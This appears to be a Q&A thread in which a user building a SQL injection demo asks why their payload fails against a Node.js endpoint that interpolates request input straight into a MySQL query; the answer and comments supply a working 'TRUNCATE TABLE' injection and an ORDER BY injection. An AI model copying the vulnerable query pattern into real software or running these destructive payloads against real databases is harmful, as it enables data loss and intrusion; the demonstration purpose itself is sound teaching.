# Trying to show a demo on SQL Injection

Tags: sql-injection

I'm trying to show a demo on SQL injection but doesn't seem to work. I have tried to truncate a table named demo with this: `"SELECT * FROM products WHERE booktitle like '%'Songs'; TRUNCATE TABLE demo --%'"` but is not working.

I'm using MySQL with Nodejs and here is the code:

```
app.post("/api/productsearch", (req, res) => {
    db.query(`SELECT * FROM products WHERE booktitle like '%${req.body.searchData.booktitle}%'`, (err, result) => {
        if (err) {
            console.log(err);
        } else {
            res.json(result);
        }
    }
    )
})
```

How do I do a SQL injection on the productsearch api? Many thanks in advance and greatly appreciate any helps. Thanks

Comment: What does it means "not working"? Post the full error, or lack of, that you've got.

Answer (score 3, accepted):

If you enter `booktitle` as `'; TRUNCATE TABLE demo --` , then the resulting SQL statement is

```sql
SELECT * FROM products WHERE booktitle like '%'; TRUNCATE TABLE demo -- %'
```

Comment: hi Heiko, I still got an error that says "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '--%'' at line 1", Thanks

Comment: "In MySQL, the --  (double-dash) comment style requires the second dash to be followed by at least one whitespace."
@Nat, so a space is needed after the double hyphen, I edited my answer accordingly.

Comment: hi Heiko, thanks it works, I used '; TRUNCATE TABLE demo# instead of double dashes. thanks again

Comment: hi Heiko, one question, is it possible to do an order by clause with the code I have? thank

Comment: You can "sneak in" an order by clause by giving the following middle part as "booktitle":
`SELECT * FROM products WHERE booktitle like '%` `' ORDER BY rating DESC #` `%'`